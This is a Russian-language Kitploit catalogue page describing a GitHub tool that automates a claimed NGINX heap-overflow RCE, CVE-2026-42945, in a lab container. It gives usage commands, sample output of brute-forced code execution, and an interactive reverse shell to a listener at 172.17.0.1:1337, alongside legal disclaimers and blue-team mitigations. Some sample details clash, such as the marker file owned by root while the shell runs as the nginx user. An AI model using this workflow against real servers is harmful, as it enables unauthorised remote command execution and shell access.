Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-42945_NginxRift — Автоматизирует эксплуатацию уязвимости CVE-2026-42945 в контейнерах NGINX: проверяет уязвимые цели, перебирает смещения кучи, выполняет команды и открывает интерактивный reverse shell. | Kitploit
Инструменты/GitHubGitHub/kentox493/cve-2026-42945_nginxrift
Безопасность контейнеровАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеRed TeamingЭксплуатация Бинарных Файлов

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
kentox493/cve-2026-42945_nginxrift

CVE-2026-42945_NginxRift

Автоматизирует эксплуатацию уязвимости CVE-2026-42945 в контейнерах NGINX: проверяет уязвимые цели, перебирает смещения кучи, выполняет команды и открывает интерактивный reverse shell.

Репозиторий
1927 дней назадЕщё не проверено

🚀 Автоматизация PoC NGINX Rift — CVE-2026-42945

Драйвер автоматизации PoC для эксплуатации RCE в контейнере nginx-rift · Проверка цели → Эксплуатация одной командой → Интерактивный reverse-shell

Shell Python Platform License

Одна команда оркестрирует весь процесс эксплуатации — от проверки контейнера до получения shell.


⚠️ Этическое и правовое предупреждение Этот инструмент предназначен только для законного и авторизованного тестирования безопасности — контрактный пентест, лабораторные работы/CTF или собственные активы. Использование без разрешения владельца системы является уголовным преступлением (UU ITE, Computer Fraud and Abuse Act и др.). Пользователь несёт полную ответственность за его использование.


📖 Сводка об уязвимости

CVE-2026-42945 — это уязвимость Remote Code Execution (RCE) в конфигурации NGINX «Rift»: ошибка heap-based buffer overflow в модуле ngx_http_rewrite_module, которая срабатывает через определённый location block (/api/users/...). В результате атакующий может выполнять команды через обработчик system() внутри контейнера.

Репозиторий содержит 2 компонента:

ФайлНазначение
poc.pyДрайвер эксплойта — brute-force смещения кучи, два режима: --cmd (одна команда) и --shell (reverse shell)
scan.shОркестратор автоматизации — проверка цели, запуск PoC, проверка результата и интерактивная shell-сессия

🏗 Схема работы

root@kitploit:~
┌─────────────────────────────┐
│         scan.sh             │
│  Mode: auto / cmd / shell   │
└─────────────┬───────────────┘
              ▼
      [0] Preflight
      cek docker, curl, python3,
      nc, timeout + poc.py ada
              ▼
      [1] Verifikasi Target
      docker ps (label compose)
      → curl /api/users/42 (HTTP 200)
              ▼
      [2] PoC --cmd (max 3× retry)
      python3 poc.py --cmd 'echo hello
      from depthfirst > /tmp/pwned'
              │
              ▼ (timeout 300s per attempt)
      Verifikasi ground-truth:
      docker exec cat /tmp/pwned
              ▼
      [3] PoC --shell (opsional)
      listener 172.17.0.1:1337
      → prompt /bin/sh interaktif

⚙️ Системные требования

Оператор (хост, на котором запускается скрипт):

  • Linux (bash) — протестировано на Kali / Ubuntu / Debian
  • docker (с sudo или пользователь в группе docker)
  • python3 + poc.py (в том же каталоге, что и scan.sh)
  • curl, nc (netcat), timeout (coreutils)

Цель (лабораторный стенд):

  • Контейнер nginx-rift запущен (подготовка через docker compose)
  • Порт хоста 19321 открыт на 127.0.0.1
  • Контейнер подключён к Docker bridge (по умолчанию 172.17.0.1 для listener на хосте)

📥 Установка

root@kitploit:~
# 1. Clone
git clone https://github.com/Kentox493/CVE-2026-42945_NginxRift.git
cd CVE-2026-42945_NginxRift

# 2. Pastikan executable
chmod +x scan.sh

# 3. (Opsional) Verifikasi dependensi
command -v docker python3 curl nc timeout

scan.sh и poc.py должны находиться в одном каталоге.


🚀 Использование

root@kitploit:~
./scan.sh          # alur lengkap (default: auto)
./scan.sh cmd      # hanya PoC single-command + verifikasi marker
./scan.sh shell    # langsung reverse-shell interaktif
./scan.sh help     # tampilkan bantuan

Режим auto (по умолчанию)

  1. Preflight — проверка всех зависимостей.
  2. Проверка цели — контейнер запущен? HTTP 200?
  3. PoC --cmd — записывает маркер hello from depthfirst в /tmp/pwned внутри контейнера (автоматические повторы, максимум 3×, timeout 300 с на попытку).
  4. Проверка результата — docker exec cat /tmp/pwned должен содержать маркер (ground-truth, а не просто чтение вывода).
  5. Запрос перейти к reverse-shell? → y для интерактивной сессии.

Режим shell

root@kitploit:~
./scan.sh shell

Запускает poc.py --shell с listener 172.17.0.1:1337. После успешного brute-force вы получаете интерактивный промпт /bin/sh от имени пользователя worker NGINX внутри контейнера.

Примечание: IP 172.17.0.1 — это адрес хоста в Docker bridge по умолчанию. Если ваш bridge отличается (docker network inspect bridge), измените переменную LISTEN_IP в верхней части scan.sh.


🔧 Настраиваемые параметры

Все параметры собраны в блоке конфигурации в верхней части scan.sh:


📸 Пример вывода

root@kitploit:~
┌──────────────────────────────────────────────────────────────┐
│  NGINX RIFT · CVE-2026-42945 · PoC Automation Driver  │
└──────────────────────────────────────────────────────────────┘

── 0 ── Preflight
[+] Semua dependensi tersedia (docker, curl, python3, nc, timeout, poc.py)

── 1 ── Verifikasi Container & Target
[+] Container 'nginx-rift-nginx-1' berjalan
[+] Target responsif (HTTP 200): http://127.0.0.1:19321/api/users/42

── 2 ── PoC Single-Command (--cmd)
[i] Payload : echo hello from depthfirst > /tmp/pwned
[i] Target  : 127.0.0.1:19321
[!] Percobaan 1/3 — brute-force loop berjalan (timeout 300s)...

[*] trying offset 0x8a0
[*] crashed - system("...") executed
[i] Percobaan 1 selesai dalam 42 detik (rc=0)
[+] Exploit BERHASIL — marker terverifikasi: 'hello from depthfirst' (milik root)

[?] Lanjut ke reverse-shell interaktif? [y/N]: y

── 3 ── PoC Reverse-Shell (--shell)
[i] Reverse shell akan terhubung ke 172.17.0.1:1337
[i] poc.py membuka listener netcat lokal lalu menjalankan brute-force

[+] Connection from 172.18.0.2:49312
/bin/sh: 0# id
uid=1000(nginx) gid=1000(nginx) groups=1000(nginx)

🛠 Устранение неполадок


🛡 Меры по устранению (для Blue Team)

  1. Обновите NGINX — перейдите на версию, исправляющую ngx_http_rewrite_module, или уберите конфигурацию Rift.
  2. Ограничьте доступ извне — не открывайте порт контейнера для 0.0.0.0; используйте внутреннюю сеть + reverse proxy с WAF.
  3. Минимальные привилегии — запускайте worker NGINX без дополнительных привилегий; не запускайте контейнер с флагом --privileged.
  4. Мониторинг — алерты на подозрительные запросы к /api/users/ (нечисловые паттерны, длинные payload), обнаружение запуска /bin/sh из процесса nginx.
  5. Сегментация сети — изолируйте bridge контейнера от хоста; ограничьте исходящий трафик (egress) контейнера, чтобы затруднить reverse shell.

📁 Структура репозитория

root@kitploit:~
CVE-2026-42945_NginxRift/
├── scan.sh     # Automation orchestrator (bash) — verifikasi, PoC, verifikasi marker, shell
├── poc.py      # Exploit driver (python) — brute-force heap offset, mode --cmd / --shell
└── README.md   # Dokumentasi ini

⚖️ Отказ от ответственности и лицензия

Только для законного использования. Инструмент предназначен для:

  • Профессионального тестирования на проникновение (по письменному договору)
  • Исследований в области безопасности и ответственного раскрытия уязвимостей
  • Лабораторных сред / CTF

Вы обязаны получить письменное разрешение владельца системы перед запуском этого инструмента на любой инфраструктуре.

Репозиторий предоставляется «as-is» без каких-либо гарантий. Авторы не несут ответственности за неправомерное использование.

Лицензия: MIT


📚 Ссылки

  • CVE-2026-42945 — NVD / MITRE
  • NGINX ngx_http_rewrite_module — официальная документация
  • Docker Compose — документация
Скачать инструмент
ЭлементОписание
CVECVE-2026-42945
ТипRemote Code Execution (RCE)
КомпонентNGINX (ngx_http_rewrite_module) — конфигурация «Rift»
ТриггерЗапрос к уязвимому location block (/api/users/{id})
ВоздействиеВыполнение произвольных команд от имени пользователя worker NGINX внутри контейнера
Лабораторный стендКонтейнер nginx-rift-nginx-1 — порт хоста 19321
ПеременнаяПо умолчаниюНазначение
DOCKERsudo dockerЗамените на docker, если пользователь уже в группе docker
PROJECT_LABELcom.docker.compose.project=nginx-riftФильтр идентификации контейнера
CONTAINERnginx-rift-nginx-1Имя целевого контейнера
TARGET_HOST / TARGET_PORT127.0.0.1 / 19321Адрес цели
LISTEN_IP / LISTEN_PORT172.17.0.1 / 1337Listener reverse shell
MARKER_FILE / MARKER_EXPECT/tmp/pwned / hello from depthfirstПроверка выполнения
CMD_TIMEOUT300Тайм-аут на одну попытку (секунды)
MAX_ATTEMPTS3Количество повторов PoC --cmd
ПроблемаРешение
Контейнер ... не запущенcd <project-dir> && sudo docker compose up -d, затем повторите
HTTP 000 / соединение отклоненоПорт 19321 ещё не готов — подождите несколько секунд, проверьте docker ps
Файл 'poc.py' не найденЗапускайте scan.sh из каталога репозитория (poc.py должен быть в том же каталоге)
PoC --cmd постоянно не срабатывает (3×)Увеличьте MAX_ATTEMPTS / CMD_TIMEOUT; убедитесь, что ядро и версия NGINX соответствуют стенду
Reverse shell не подключаетсяПроверьте LISTEN_IP в соответствии с bridge (docker network inspect bridge); убедитесь, что порт 1337 не занят
Ошибка unrecognized argumentsУбедитесь, что версия poc.py поддерживает флаги --listen-ip/--listen-port (см. python3 poc.py -h)